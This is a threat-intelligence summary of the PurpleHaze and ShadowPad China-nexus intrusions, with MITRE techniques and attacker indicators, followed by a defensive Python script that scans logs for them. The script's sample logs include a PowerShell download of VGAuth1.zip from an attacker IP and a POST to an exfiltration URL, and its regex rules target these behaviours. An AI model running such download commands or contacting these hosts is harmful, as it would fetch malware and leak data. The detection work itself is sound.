SentinelLABS detected and thwarted reconnaissance and intrusion operations linked to the PurpleHaze and ShadowPad activity clusters, attributed with high confidence to China-nexus threat actors targeting SentinelOne and related organizations. Despite multiple sophisticated attacks between 2024 and 2025, SentinelOne’s infrastructure remained uncompromised, underscoring persistent threats to cybersecurity vendors and global industries. #PurpleHaze #ShadowPad #GOREshell #APT15 #UNC5174
Key points
- SentinelLABS identified and disrupted reconnaissance targeting SentinelOne in October 2024 and a ShadowPad-linked intrusion in early 2025 affecting an IT logistics firm managing SentinelOne hardware.
- The PurpleHaze and ShadowPad clusters involved over 70 victims globally, including government, media, manufacturing, finance, telecom, and research sectors.
- High-confidence attribution links the activities to China-nexus cyberespionage actors, including groups overlapping with APT15 and UNC5174.
- ShadowPad malware samples were obfuscated using ScatterBrain variants, and their infrastructure included multiple C2 domains associated with global intrusions from July 2024 to March 2025.
- PurpleHaze operations utilized GOREshell backdoors exploiting CVE-2024-8963 and CVE-2024-8190 vulnerabilities, employing China-based ORB network infrastructure for stealth and persistence.
- The threat actors employed open-source tools from The Hacker’s Choice community and reused private SSH keys across multiple malware variants and platforms.
- Continuous monitoring, threat intelligence sharing, and proactive defense helped SentinelOne prevent compromise despite targeted attacks.
MITRE Techniques
- [T1059] Command and Scripting Interpreter – PowerShell commands used to deploy ShadowPad malware (“Downloads a file named x.dat from a remote endpoint…” and executes it).
- [T1566] Phishing – Initial intrusion often involved exploitation of vulnerabilities in network devices such as Check Point gateways.
- [T1071] Application Layer Protocol – ShadowPad used DNS over HTTPS and WebSocket protocols for C2 communication (“leveraging DNS over HTTPS (DoH)…”).
- [T1036] Masquerading – Malicious DLL (glib-2.0.dll) masquerading as the legitimate GLib-2.0 library to bypass detection.
- [T1027] Obfuscated Files or Information – ShadowPad and GOREshell samples were obfuscated using ScatterBrain, Garble, and UPX packing techniques (“obfuscated using Garble…” and “packed with UPX”).
- [T1505] Server Software Component – Deployment of malicious DLL files loaded by legitimate executables vulnerable to DLL hijacking (“Windows DLLs designed to be loaded by specific legitimate executables vulnerable to DLL hijacking”).
- [T1105] Ingress Tool Transfer – Download of malware components from attacker-controlled servers (“downloaded an archive file named VGAuth1.zip from 103.248.61[.]36”).
- [T1110] Brute Force – SSH private key reuse observed across multiple malware variants to maintain persistence.
- [T1033] System Owner/User Discovery – Use of Windows commands like ipconfig for network reconnaissance (“executed the ipconfig Windows command…”).
Indicators of Compromise
- [File Hash] Malware and tools – AppSov.exe ShadowPad sample (f52e18b7c8417c7573125c0047adb32d8d813529), GOREshell components (411180c89953ab5e0c59bd4b835eef740b550823, 7dabf87617d646a9ec3e135b5f0e5edae50cd3b9), Nimbo-C2 agent PfSvc.exe (4896cfff334f846079174d3ea2d541eec72690a0), webshell (106248206f1c995a76058999ccd6a6d0f420461e), and others.
- [Domain] C2 and infrastructure domains – downloads.trendav[.]vip, cloud.trendav[.]co, epp.navy[.]ddns[.]info, dscriy.chtq[.]net, mail.secmailbox[.]us, sentinelxdr[.]us, tatacom.duckdns[.]org, and trendav[.]vip among others linked to PurpleHaze and ShadowPad operations.
- [IP Address] Malicious infrastructure – 142.93.214[.]219 (GOREshell C2), 65.38.120[.]110 (ShadowPad C2), 103.248.61[.]36 (malware hosting), 107.173.111[.]26 (GOREshell C2 server), 128.199.124[.]136 (C2 proxy server), and 45.13.199[.]209 (exfiltration endpoint).
- [URL] Exfiltration and C2 endpoints – https://45.13.199[.]209/rss/rss.php (data exfiltration URL).
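The indicator list above is only useful once it is turned into something that can be run over telemetry. The following added example (not code from the SentinelLABS report) loads the hashes, domains, IPs and URL exactly as listed, refangs the `[.]` notation, and scans a handful of constructed log lines for them, alongside three behavioural checks taken from the MITRE section (PowerShell fetching x.dat, the VGAuth1.zip download, and a load of glib-2.0.dll). The log lines, the regexes and the labels are assumptions made for the example; domain matching deliberately also catches subdomains of a listed apex, so a hit on downloads.trendav.vip is reported twice (once for the host, once for trendav.vip).

```python
"""Scan log lines for the PurpleHaze/ShadowPad IoCs listed in the summary.

Added example: the sample log lines are constructed, not taken from the report.
"""
from __future__ import annotations

import re

# Indicators copied from the summary, kept defanged; refang() restores them.
IOC_HASHES = {
    "f52e18b7c8417c7573125c0047adb32d8d813529": "ShadowPad sample AppSov.exe",
    "411180c89953ab5e0c59bd4b835eef740b550823": "GOREshell component",
    "7dabf87617d646a9ec3e135b5f0e5edae50cd3b9": "GOREshell component",
    "4896cfff334f846079174d3ea2d541eec72690a0": "Nimbo-C2 agent PfSvc.exe",
    "106248206f1c995a76058999ccd6a6d0f420461e": "webshell",
}
IOC_DOMAINS = {
    "downloads.trendav[.]vip": "C2/infrastructure domain",
    "cloud.trendav[.]co": "C2/infrastructure domain",
    "epp.navy[.]ddns[.]info": "C2/infrastructure domain",
    "dscriy.chtq[.]net": "C2/infrastructure domain",
    "mail.secmailbox[.]us": "C2/infrastructure domain",
    "sentinelxdr[.]us": "C2/infrastructure domain",
    "tatacom.duckdns[.]org": "C2/infrastructure domain",
    "trendav[.]vip": "C2/infrastructure domain",
}
IOC_IPS = {
    "142.93.214[.]219": "GOREshell C2",
    "65.38.120[.]110": "ShadowPad C2",
    "103.248.61[.]36": "malware hosting",
    "107.173.111[.]26": "GOREshell C2 server",
    "128.199.124[.]136": "C2 proxy server",
    "45.13.199[.]209": "exfiltration endpoint",
}
IOC_URLS = {"https://45.13.199[.]209/rss/rss.php": "data exfiltration URL"}

# Behavioural checks derived from the MITRE section (constructed regexes).
BEHAVIOUR_RULES = {
    "T1059 PowerShell fetching x.dat": re.compile(r"powershell.*\bx\.dat\b", re.I),
    "T1105 VGAuth1.zip download": re.compile(r"VGAuth1\.zip", re.I),
    "T1036 glib-2.0.dll load": re.compile(r"glib-2\.0\.dll", re.I),
}


def refang(indicator: str) -> str:
    """Turn the defanged '[.]' notation back into a real dotted name."""
    return indicator.replace("[.]", ".")


def _domain_regex(domain: str) -> re.Pattern:
    # The domain itself or any subdomain of it, but not a longer unrelated
    # name that merely contains it (e.g. 'nottrendav.vip').
    return re.compile(
        r"(?<![A-Za-z0-9.-])(?:[A-Za-z0-9-]+\.)*" + re.escape(domain) + r"(?![A-Za-z0-9-])",
        re.I,
    )


def _ip_regex(ip: str) -> re.Pattern:
    # Whole address only: reject when more octet digits follow or precede.
    return re.compile(r"(?<![\d.])" + re.escape(ip) + r"(?!\d|\.\d)")


def build_matchers() -> list[tuple[str, str, re.Pattern, str]]:
    matchers = []
    for h, label in IOC_HASHES.items():
        matchers.append(("hash", h, re.compile(r"\b" + h + r"\b", re.I), label))
    for d, label in IOC_DOMAINS.items():
        d = refang(d)
        matchers.append(("domain", d, _domain_regex(d), label))
    for ip, label in IOC_IPS.items():
        ip = refang(ip)
        matchers.append(("ip", ip, _ip_regex(ip), label))
    for u, label in IOC_URLS.items():
        u = refang(u)
        matchers.append(("url", u, re.compile(re.escape(u), re.I), label))
    return matchers


MATCHERS = build_matchers()


def scan_line(line: str) -> list[dict]:
    """Return every IoC and behavioural hit found in one log line."""
    hits = []
    for kind, indicator, pattern, label in MATCHERS:
        if pattern.search(line):
            hits.append({"kind": kind, "indicator": indicator, "label": label})
    for name, pattern in BEHAVIOUR_RULES.items():
        if pattern.search(line):
            hits.append({"kind": "behaviour", "indicator": name, "label": name})
    return hits


def scan(lines: list[str]) -> list[dict]:
    """Scan all lines; each finding records the 1-based line number."""
    return [{"line": n, **hit} for n, line in enumerate(lines, 1) for hit in scan_line(line)]


def hit_lines(findings: list[dict]) -> list[int]:
    return sorted({f["line"] for f in findings})


# Constructed sample telemetry (proxy and EDR style lines); line 5 is benign.
SAMPLE_LOGS = [
    "2025-01-14T09:12:03Z proxy CONNECT downloads.trendav.vip:443 src=10.0.0.23 action=allow",
    '2025-01-14T09:12:09Z edr process=powershell.exe cmdline="Invoke-WebRequest http://103.248.61.36/VGAuth1.zip -OutFile C:\\Users\\Public\\VGAuth1.zip"',
    "2025-01-14T09:15:41Z edr file=AppSov.exe sha1=F52E18B7C8417C7573125C0047ADB32D8D813529 action=created",
    "2025-01-14T09:16:02Z proxy POST https://45.13.199.209/rss/rss.php bytes=48211",
    "2025-01-14T09:20:00Z proxy CONNECT updates.example.com:443 src=10.0.0.23 action=allow",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"line {f['line']}: [{f['kind']}] {f['indicator']} ({f['label']})")
```

Hash matching is case-insensitive because EDR products disagree on hex case, and IP matching refuses partial octet matches so 103.248.61.36 is not reported inside 103.248.61.367. The glib-2.0.dll rule will fire on any load of a DLL by that name, so in a real deployment it belongs in a review queue rather than an alert; the page gives the file name but not the legitimate path that would let the rule be tightened.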